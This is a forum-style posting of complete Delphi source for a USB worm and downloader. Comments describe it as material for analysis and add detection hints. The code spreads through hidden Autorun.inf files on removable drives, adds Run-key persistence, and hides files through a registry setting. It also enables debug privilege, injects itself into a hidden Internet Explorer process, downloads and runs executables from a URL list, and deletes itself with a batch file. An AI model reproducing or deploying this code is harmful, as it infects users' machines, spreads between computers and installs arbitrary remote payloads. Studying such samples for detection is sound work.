一个含U盘感染的downloader代码。(delphi)

一个含U盘感染的downloader代码。可以作为原理进行分析。(delphi)
program AutoDown;
// Project file of a USB-propagating downloader. The main block at the end of
// the file dispatches to setme (first run) or AutoAndw0rM (resident copy).
{$R  'ICON32.RES'  'ICON32.TXT' }
// Fixed image base. Inject later copies this process image into another
// process at the very same address, which presumably is why a non-default
// base is pinned here.
{$IMAGEBASE $17140000}
uses
Windows, SysUtils, wininet, mmsystem, messages;

var
htimer: integer; // timer id returned by TimeSetEvent in infecttimer
msg: tmsg;       // message record for the GetMessage loops
dw: bool;        // set by TimerProc once the online branch (RunInject) has run
url1: pchar =
('http://www.xxx.com/xx.exe');
url2: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url3: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url4: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url5: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url6: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url7: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url8: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url9: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url10: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url11: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url12: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url13: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url14: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');
url15: pchar =
('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx');

// Function pointers resolved at run time by Download via GetProcAddress
// (URLDownloadToFileA from urlmon.dll, ShellExecuteA from Shell32.dll).
Downfile: function(Caller: pointer; URL: PChar; FileName: PChar; Reserved:
   LongWord; StatusCB: pointer): Longint; stdcall;
hShell, hUrlmon: THandle; // module handles filled in by Download

ShellRun: function(hWnd: HWND; Operation, FileName, Parameters, Directory:
   PChar; ShowCmd: Integer): Cardinal; stdcall;

// Forward declaration: RunInject is called from TimerProc but defined later.
procedure RunInject(InjType: integer); stdcall; forward;
const
// Name of the dropped copy, both at each removable drive root (SendMetoDriver)
// and under the temp path (exefile, assigned in the main block).
ExeName = 'system.exe';
// File-attribute constants (same values as the SysUtils fa* constants).
faReadOnly = $00000001;
faHidden = $00000002;
faSysFile = $00000004;
faVolumeID = $00000008;
faDirectory = $00000010;
faArchive = $00000020;
faAnyFile = $0000003F;
// Digit / letter tables; not referenced anywhere in this listing.
Lyint: array[0..9] of Char = ('0', '1', '2', '3', '4', '5', '6', '7', '8',
   '9');
Lychr: array[0..25] of Char = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
   'j',
   'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
   'u', 'v', 'w', 'x', 'y', 'z');

var
// Globals. exefile is the temp-path copy (main block); OpenPath, sa1, sa2 and
// NoDel are used by setme. DriverList is shadowed by infect's local of the
// same name; i, Len, infsize, TempFile and MyCursor are not referenced in
// this listing.
i, Len, infsize: integer;
exefile, OpenPath, DriverList, TempFile: string;
NoDel: integer;
sa1, sa2, MyCursor: THandle;

type
// Local re-declarations of the SysUtils search-record types used by the
// FindFirst / FindMatchingFile / FindClose copies below.
TFileName = type string;
TSearchRec = record
   Time: Integer;
   Size: Integer;
   Attr: Integer;
   Name: TFileName;
   ExcludeAttr: Integer;
   FindHandle: THandle platform;
   FindData: TWin32FindData platform;
end;

// Variant overlay used to split a DOS date/time Integer into words/bytes.
LongRec = packed record
   case Integer of
     0: (Lo, Hi: Word);
     1: (Words: array[0..1] of Word);
     2: (Bytes: array[0..3] of Byte);
end;

{$R *.RES}

function FileExists(const FileName: string): Boolean;
// True when FindFirstFileA returns a handle for FileName, i.e. an entry with
// that name exists (file or directory).
var
Handle: THandle;
FindData: TWin32FindData;
begin
Handle := FindFirstFileA(PChar(FileName), FindData);
result := Handle <> INVALID_HANDLE_VALUE;
if result then
begin
   // NOTE(review): a find handle is normally released with Windows.FindClose;
   // CloseHandle is used here instead.
   CloseHandle(Handle);
end;
end;

function FindMatchingFile(var F: TSearchRec): Integer;
// Advances F past entries whose attributes intersect F.ExcludeAttr, then copies
// the current entry's local DOS time, size, attributes and name into F.
// Returns 0 on success, or GetLastError when FindNextFile runs out of entries.
var
LocalFileTime: TFileTime;
begin
with F do
begin
   while FindData.dwFileAttributes and ExcludeAttr <> 0 do
     if not FindNextFile(FindHandle, FindData) then
     begin
       Result := GetLastError;
       Exit;
     end;
   FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime);
   // DOS date lands in the high word of Time, DOS time in the low word.
   FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi,
     LongRec(Time).Lo);
   Size := FindData.nFileSizeLow;
   Attr := FindData.dwFileAttributes;
   Name := FindData.cFileName;
end;
Result := 0;
end;

procedure FindClose(var F: TSearchRec);
// Releases F.FindHandle when it is open and marks it invalid, so a second
// call is a no-op.
begin
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
   Windows.FindClose(F.FindHandle);
   F.FindHandle := INVALID_HANDLE_VALUE;
end;
end;

function FindFirst(const Path: string; Attr: Integer;
var
F: TSearchRec): Integer;
// Starts a FindFirstFile search for Path. Entries carrying any faSpecial
// attribute not requested in Attr are skipped through F.ExcludeAttr.
// Returns 0 on success, otherwise GetLastError (closing the handle first).
// Not called anywhere in this listing.
const
faSpecial = faHidden or faSysFile or faVolumeID or faDirectory;
begin
F.ExcludeAttr := not Attr and faSpecial;
F.FindHandle := FindFirstFile(PChar(Path), F.FindData);
if F.FindHandle <> INVALID_HANDLE_VALUE then
begin
   Result := FindMatchingFile(F);
   if Result <> 0 then FindClose(F);
end
else
   Result := GetLastError;
end;

function FileSetAttr(const FileName: string; Attr: Integer): Integer;
// Sets the attributes of FileName; 0 on success, else GetLastError.
// Not called anywhere in this listing.
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
   Result := GetLastError;
end;

function deletefile(const FileName: string): Integer;
// Despite the name this only returns GetFileAttributes(FileName); nothing is
// removed. Being declared in the program, it presumably shadows
// Windows.DeleteFile for the DeleteFile(...) call in setme.
begin
Result := GetFileAttributes(PChar(FileName));
end;



function GetDirectory(dInt: integer): string;
// Returns a well-known directory: 0 = Windows directory, 1 = system
// directory, 2 = temp path. For any other dInt the buffer is left
// uninitialised. The non-temp branch appends an empty string as written in
// this listing.
var
s: array[0..255] of Char;
begin
case dInt of
   0: GetWindowsDirectory(@s, 256); // path of the Windows installation folder
   1: GetSystemDirectory(@s, 256); // path of the system folder
   2: GetTempPath(256, @s); // path of the Temp folder
end;
if dInt = 2 then
   result := string(s)
else
   result := string(s) + '';
end;

function ExtractFilePath(FileName: string): string;
// Moves characters from the front of FileName into Result for as long as a
// separator is still found by Pos. Pos with an empty pattern returns 0, so as
// written only '/' keeps the loop going. Used by DelMe on the temp path.
begin
Result := '';
while ((Pos('', FileName) <> 0) or (Pos('/', FileName) <> 0)) do
begin
   Result := Result + Copy(FileName, 1, 1);
   Delete(FileName, 1, 1);
end;
end;

function ExtractFileName(FileName: string): string;
// Strips everything up to and including each separator found by Pos and
// returns the remainder. setme uses it to compare the running executable's
// name against ExeName.
begin
while Pos('', FileName) <> 0 do
   Delete(FileName, 1, Pos('', FileName));
while Pos('/', FileName) <> 0 do
   Delete(FileName, 1, Pos('/', FileName));
Result := FileName;
end;

function SetRegValue(key: Hkey; subkey, name, value: string): boolean;
// Creates/opens subkey under key and writes name = value as REG_EXPAND_SZ.
// True only when RegSetValueEx returns 0; RegCreateKey's result is not
// checked. Used by regme for persistence and the Explorer SHOWALL setting.
var
regkey: hkey;
begin
result := false;
RegCreateKey(key, PChar(subkey), regkey);
if RegSetValueEx(regkey, Pchar(name), 0, REG_EXPAND_SZ, pchar(value),
   length(value)) = 0 then
   result := true;
RegCloseKey(regkey);
end;

function CompareText(const S1, S2: string): Integer; assembler;
// Case-insensitive comparison in the style of the Delphi RTL routine. The
// lengths are read from the string headers ([EAX-4] / [EDX-4]); bytes in
// 'a'..'z' are folded to upper case by subtracting 20h before comparing.
// Returns the difference of the first mismatching bytes, or of the lengths
// when the shorter string is a prefix of the longer one; 0 when equal.
asm
       PUSH    ESI
       PUSH    EDI
       PUSH    EBX
       MOV    ESI,EAX
       MOV    EDI,EDX
       OR      EAX,EAX
       JE      @@0
       MOV    EAX,[EAX-4]
@@0:    OR      EDX,EDX
       JE      @@1
       MOV    EDX,[EDX-4]
@@1:    MOV    ECX,EAX
       CMP    ECX,EDX
       JBE    @@2
       MOV    ECX,EDX
@@2:    CMP    ECX,ECX
@@3:    REPE    CMPSB
       JE      @@6
       MOV    BL,BYTE PTR [ESI-1]
       CMP    BL,'a'
       JB      @@4
       CMP    BL,'z'
       JA      @@4
       SUB    BL,20H
@@4:    MOV    BH,BYTE PTR [EDI-1]
       CMP    BH,'a'
       JB      @@5
       CMP    BH,'z'
       JA      @@5
       SUB    BH,20H
@@5:    CMP    BL,BH
       JE      @@3
       MOVZX  EAX,BL
       MOVZX  EDX,BH
@@6:    SUB    EAX,EDX
       POP    EBX
       POP    EDI
       POP    ESI
end;

procedure DelMe;
// Self-deletion. Writes a batch file named ~Lying.bAt under the temp path that
// loops deleting the running executable (ParamStr(0)) until it is gone and
// then deletes itself (%0). The batch is marked hidden+system and started
// hidden at idle priority; CreateProcess's result only decides whether the
// handles are closed. Detection: this batch name appearing in the temp
// directory, and a hidden cmd.exe deleting a freshly started executable.
var
BatchFile: TextFile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
BatchFileName := ExtractFilePath(GetDirectory(2)) + '~Lying.bAt';
AssignFile(BatchFile, BatchFileName);
Rewrite(BatchFile);
Writeln(BatchFile, ':tRy');
Writeln(BatchFile, 'DeL "' + ParamStr(0) + '" /a');
Writeln(BatchFile, 'iF eXiSt "' + ParamStr(0) + '"' + ' gOtO tRy');
Writeln(BatchFile, 'dEl %0 /A');
CloseFile(BatchFile);
SetFileAttributes(pchar(BatchFileName), FILE_ATTRIBUTE_HIDDEN +
   FILE_ATTRIBUTE_SYSTEM);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil,
   False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo,
   ProcessInfo) then
begin
   CloseHandle(ProcessInfo.hThread);
   CloseHandle(ProcessInfo.hProcess);
end;
end;

function GetDrives: string;
// Collects the letters of all DRIVE_REMOVABLE drives into one string. i runs
// 1..25, so Chr(i + 65) covers 'B'..'Z'; 'A' is never tested. The fixed and
// network alternatives are commented out.
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 1 to 25 do // iterate over the 26 letters
begin
   D := Chr(i + 65);
   Str := D + ':';
   DiskType := GetDriveType(PChar(Str)); // local, network or removable disk...
   if {(DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) or} (DiskType =
     DRIVE_REMOVABLE) then
     Result := Result + D;
end;
end;

function SendMetoDriver(const DriveName: string): Boolean;
// Drops the propagation pair on one drive root: an Autorun.inf whose
// [AutoRun] open / shellexecute / shellAutocommand entries name ExeName, and a
// copy of the running executable as ExeName. Each is written only when absent
// and then marked hidden+system. Result is never assigned.
// Detection: hidden+system Autorun.inf and system.exe at a removable drive's
// root. Mitigation: AutoRun from removable media is disabled by default on
// current Windows releases; removable-drive write restrictions stop the drop.
var
InfFile, Mmfile: string;
InfText: TextFile;
begin
InfFile := DriveName + 'Autorun.inf';
MmFile := DriveName + ExeName;
if (not FileExists(InfFile))  then
begin
   AssignFile(InfText, InfFile);
   try
     ReWrite(InfText);
     WriteLn(InfText, '[AutoRun]');
     WriteLn(InfText, 'open=' + ExeName);
     WriteLn(InfText, 'shellexecute=' + ExeName);
     WriteLn(InfText, 'shellAutocommand=' + ExeName);
   finally
     CloseFile(InfText);
   end;
   SetFileAttributes(pchar(inffile), FILE_ATTRIBUTE_HIDDEN +
     FILE_ATTRIBUTE_SYSTEM);
end;
if (not FileExists(MmFile))  then
begin
   CopyFile(pchar(ParamStr(0)), pchar(MmFile), false);
   SetFileAttributes(pchar(MmFile), FILE_ATTRIBUTE_HIDDEN +
     FILE_ATTRIBUTE_SYSTEM);
end;
end;

function IsFileInUse(fName: string): boolean;
// True when fName exists but cannot be opened with dwShareMode = 0 (exclusive
// access), i.e. another handle is open on it. False when the file does not
// exist. setme uses it to decide whether the temp copy can be replaced.
var
HFileRes: HFILE;
begin
Result := false;
if not FileExists(fName) then
   exit;
HFileRes := CreateFile(pchar(fName), GENERIC_READ or GENERIC_WRITE,
   0 {this is the trick!}, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
Result := (HFileRes = INVALID_HANDLE_VALUE);
if not Result then
   CloseHandle(HFileRes);
end;
procedure dir;
// Creates the drop directory that Download writes into (path as written in
// this listing) when it does not yet exist; any exception is swallowed.
begin
if not directoryexists(pchar('Crogram FilesWindowsUpdate')) then
try
   createdir(pchar('Crogram FilesWindowsUpdate'));
except
end;
       end;
procedure regme;
// Persistence and concealment through the registry (key paths as written in
// this listing): a value named 'Lying' pointing at exefile under the Explorer
// policies Run key, and CheckedValue = '2' under the SHOWALL key, which keeps
// hidden/system files hidden in Explorer. Detection: monitor writes to both
// keys; the 'Lying' value name is an indicator for this sample.
begin
SetRegValue(HKEY_LOCAL_MACHINE,
   'SoftWareMicrosoftWindowsCurrentVersionpoliciesExplorerRun', 'Lying', exefile); // auto-start
SetRegValue(HKEY_LOCAL_MACHINE,
   'SOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL',
   'CheckedValue', '2'); // force system files to stay hidden
end;

procedure infect();
// Called on every timer tick (TimerProc): enumerates removable drives via
// GetDrives and calls SendMetoDriver for each 'X:' root, last letter first.
// The locals i, len and driverlist shadow the globals of the same names.
var
i, len: integer;
driverlist: string;
begin
DriverList := GetDrives;
Len := Length(DriverList);
for i := Len downto 1 do
   SendMetoDriver(DriverList[i] + ':');
end;

function GetOnlineStatus: Boolean;
// True when InternetGetConnectedState reports a connection; ConTypes receives
// the connection-type flags and is otherwise unused.
var
ConTypes: Integer;
begin
ConTypes := INTERNET_CONNECTION_MODEM + INTERNET_CONNECTION_LAN +
   INTERNET_CONNECTION_PROXY;
if (InternetGetConnectedState(@ConTypes, 0) = False) then
   Result := False
else
   Result := True;
end;
procedure GetDebugPrivs; // elevate process privileges
// Enables SeDebugPrivilege on the current process token. TimerProc calls it
// right before RunInject, presumably so OpenProcess(PROCESS_ALL_ACCESS) on the
// target succeeds. No return value is checked, hToken is never closed, and
// only PrivilegeCount / Privileges[0] of tkp are initialised.
var
hToken: THandle;
tkp: TTokenPrivileges;
retval: dword;
begin
if (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or
   TOKEN_QUERY, hToken)) then
begin
   LookupPrivilegeValue(nil, 'SeDebugPrivilege', tkp.Privileges[0].Luid);
   tkp.PrivilegeCount := 1;
   tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
   AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
end;
end;
procedure TimerProc(uID, uMsg, dwUser, dw1, dw2: DWORD); stdcall;
// when the network is connected, start the various functions and the download
// Multimedia-timer callback (every 6000 ms, see infecttimer). Each tick re-runs
// infect; the first tick that sees a connection enables SeDebugPrivilege and
// calls RunInject(1), then sets dw so that branch runs only once. Exceptions
// from both steps are swallowed.
begin
try
infect;
except
end;
if GetOnlineStatus and not dw then
begin
   try
   GetDebugPrivs;
     RunInject(1); // 1 = inject into iexplore.exe
   except
   end;
   dw := true;
end;

//timeKillEvent(hTimer3);
end;

procedure infecttimer; stdcall;
// Thread entry started by AutoAndw0rM: registers TimerProc as a 6000 ms
// periodic timer, then pumps messages with an empty loop body, so the thread
// never returns.
begin
//Messagebox(0,pchar(time1+' '+hostbc+' '+urlbc),'数据', MB_OK);
hTimer := TimeSetEvent(6000, 0, TimerProc, 0, TIME_PERIODIC);
while (GetMessage(Msg, 0, 0, 0)) do
   ;
end;

procedure AutoAndw0rM;
// Resident entry point (reached from the temp copy). Exits when its own path
// contains 'pagefile.pif'; enforces a single instance with a mutex named 'dx';
// creates the drop directory and registry entries; starts the infect timer
// thread and then blocks in a message loop. Detection: the mutex name 'dx' is
// an indicator for this sample.
var
tid: dword;
begin
dw := false;
if pos('pagefile.pif', pchar(paramstr(0))) > 0 then exitprocess(0);
CreateMutex(nil, TRUE, 'dx'); // TRUE: this process owns the mutex object
if (GetLastError = ERROR_ALREADY_EXISTS) then exit; // does the mutex already exist
dir;
regme;  // write the registry entries
CreateThread(nil, 0, @infecttimer, nil, 0, TID);
while (GetMessage(Msg, 0, 0, 0)) do
   ;
end;

procedure Download; // download routine
// Runs as the remote-thread entry inside the injected process (RunInject
// passes @Download to Inject). Resolves ShellExecuteA and URLDownloadToFileA
// dynamically, then for url1..url15 downloads to a fixed path under the drop
// directory and launches the result with show command 5; every pair sits in an
// empty except block. If GetProcAddress fails, Downfile/ShellRun stay nil.
// Detection: iexplore.exe writing executables under Program Files via
// URLDownloadToFile and immediately launching them.

begin
// dw := true; //下载了一次
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell := LoadLibrary('Shell32.dll');
hUrlmon := LoadLibrary('urlmon.dll');
@ShellRun := GetProcAddress(hShell, 'ShellExecuteA');
@Downfile := GetProcAddress(hUrlmon, 'URLDownloadToFileA');

{if not directoryexists(pchar('Crogram FilesWindowsUpdate')) then
try
   createdir(pchar('Crogram FilesWindowsUpdate'));
except
end;  }
try
Downfile(nil,pchar(url1),'Crogram FilesWindowsUpdate1.exe', 0, nil);
ShellRun(0,'open','Crogram FilesWindowsUpdate1.exe',nil,nil,5);
except
end;

{Downfile(nil, pchar('http://www.mybr.org/test/a.exe'),
   'Crogram FilesWindowsUpdate1.exe', 0, nil);
ShellRun(0, 'open', 'Crogram FilesWindowsUpdate1.exe', nil, nil, 5);
}
try
   Downfile(nil, pchar(url2), 'Crogram FilesWindowsUpdate2.exe', 0, nil);
   ShellRun(0, 'open', 'Crogram FilesWindowsUpdate2.exe', nil, nil, 5);
except
end;

try
   Downfile(nil, pchar(url3), 'C:Program FilesWindowsUpdate3.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate3.exe', nil, nil, 5);
except
end;

try
   Downfile(nil, pchar(url4), 'C:Program FilesWindowsUpdate4.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate4.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url5), 'C:Program FilesWindowsUpdate5.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate5.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url6), 'C:Program FilesWindowsUpdate6.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate6.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url7), 'C:Program FilesWindowsUpdate7.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate7.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url8), 'C:Program FilesWindowsUpdate8.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate8.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url9), 'C:Program FilesWindowsUpdate9.exe', 0, nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate9.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url10), 'C:Program FilesWindowsUpdate10.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate10.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url11), 'C:Program FilesWindowsUpdate11.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate11.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url12), 'C:Program FilesWindowsUpdate12.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate12.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url13), 'C:Program FilesWindowsUpdate13.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate13.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url14), 'C:Program FilesWindowsUpdate14.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate14.exe', nil, nil, 5);
except
end;
try
   Downfile(nil, pchar(url15), 'C:Program FilesWindowsUpdate15.exe', 0,
     nil);
   ShellRun(0, 'open', 'C:Program FilesWindowsUpdate15.exe', nil, nil, 5);
except
end;
//ExitProcess(0);
end;

procedure Inject(ProcessHandle: longword; EntryPoint: pointer); // injection
// Copies this process's whole image into ProcessHandle at the same base
// address (hence the fixed {$IMAGEBASE} in the header) and starts a remote
// thread at EntryPoint with Module as its argument. No return value is
// checked. Detection: VirtualAllocEx with PAGE_EXECUTE_READWRITE followed by
// WriteProcessMemory and CreateRemoteThread into iexplore.exe, with the
// written region equal in size to another process's image.
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
// GetModuleHandle(nil) returns a pointer to the base of this process's image
Module := Pointer(GetModuleHandle(nil));
// length of the in-memory image (SizeOfImage from the optional header)
Size := PImageOptionalHeader(Pointer(integer(Module) +
   PImageDosHeader(Module)._lfanew +
   SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// release whatever the target maps at this base so a region of sufficient
// length can be allocated there
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
// allocate at the same base address as our own image
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or
   MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// with the above determined, copy the image into the target
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
// create the remote thread; injection is complete at this point
createRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

procedure setme;
// First-run path (the running executable is not the temp copy). When launched
// as ExeName from a drive root — the autorun case — and Explorer
// ('CabinetWClass') is the foreground window, it types the drive root into
// Explorer's address bar and clicks Go so the user still sees the drive open,
// and sets NoDel. It then replaces exefile with a hidden+system copy of itself
// unless that file is in use, starts the copy hidden, self-deletes via DelMe
// unless NoDel, and exits. The DeleteFile(...) call presumably resolves to the
// program's own deletefile (an attribute query) rather than Windows.DeleteFile.
begin
if (CompareText(ParamStr(0), Copy(ParamStr(0), 1, 3) + ExeName) = 0) and
   (CompareText(ExtractFileName(ParamStr(0)), exename) = 0) then
begin
   sa1 := Findwindow('CabinetWClass', nil); // My Computer / Explorer window
   if GetForegroundwindow <> sa1 then exit;
   sa1 := findwindowex(sa1, 0, 'WorkerW', nil);
   sa1 := findwindowex(sa1, 0, 'ReBarWindow32', nil);
   sa1 := findwindowex(sa1, 0, 'ComboBoxEx32', nil);
   sa2 := findwindowex(sa1, 0, 'ToolbarWindow32', nil);
   sa1 := findwindowex(sa1, 0, 'ComboBox', nil);
   sa1 := findwindowex(sa1, 0, 'Edit', nil);
   OpenPath := Copy(ParamStr(0), 1, 3);
   SendMessage(sa1, WM_SETTEXT, length(OpenPath), longint(pchar(OpenPath)));
   SendMessage(sa2, WM_LBUTTONDOWN, 0, 0);
   SendMessage(sa2, WM_LBUTTONUP, 0, 0);
   SendMessage(sa1, WM_KILLFOCUS, 0, 0); // drop focus to avoid suspicion...
   NoDel := 1;
end;
if IsFileInUse(exefile) = false then
begin
   SetFileAttributes(pchar(exefile), 0);
   DeleteFile(pchar(exefile));
   Copyfile(pchar(ParamStr(0)), pchar(exefile), false);
   SetFileAttributes(pchar(exefile), FILE_ATTRIBUTE_HIDDEN +
     FILE_ATTRIBUTE_SYSTEM);
   winexec(pchar(exefile), sw_hide);
end;
//AutoAndw0rM;
if (NoDel <> 1) then DelMe; // self-delete unless NoDel = 1
ExitProcess(0);
end;

procedure RunInject(InjType: integer);
// InjType 0: looks up the PID behind 'Shell_TrayWnd' (explorer.exe) but does
// nothing further with it. Any other value: starts Internet Explorer hidden
// from the hard-coded path, waits 500 ms, finds the 'IEFrame' PID, opens it
// with PROCESS_ALL_ACCESS and injects this image with Download as the entry
// point. Detection: a hidden iexplore.exe started by an unrelated process and
// receiving a remote thread shortly afterwards.
var
ProcessHandle, PID: longword;

begin
if InjType = 0 then // inject into explorer.exe
begin
   // get explorer's PID; Shell_TrayWnd is its class name (found with Spy++)
   GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else // inject into iexplore.exe
begin
   //createProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
   winexec(PChar('C:Program FilesInternet ExplorerIEXPLORE.EXE'), sw_hide);
   sleep(500);
   GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
   // open the process
   ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
   Inject(ProcessHandle, @Download);
   // close the handle
   CloseHandle(ProcessHandle);
   //sleep(500);
   //ExtDelMe;
end;
end;

begin
// Program entry. exefile is the temp-path copy; when the running executable
// is not that copy (first run, or the autorun copy on a drive) go through
// setme, otherwise run the resident AutoAndw0rM path.
exefile := Pchar(GetDirectory(2) + ExeName);
if CompareText(ParamStr(0), exefile) <> 0 then
   setme
else
begin
   AutoAndw0rM;
// ExitProcess(0);
end;
end.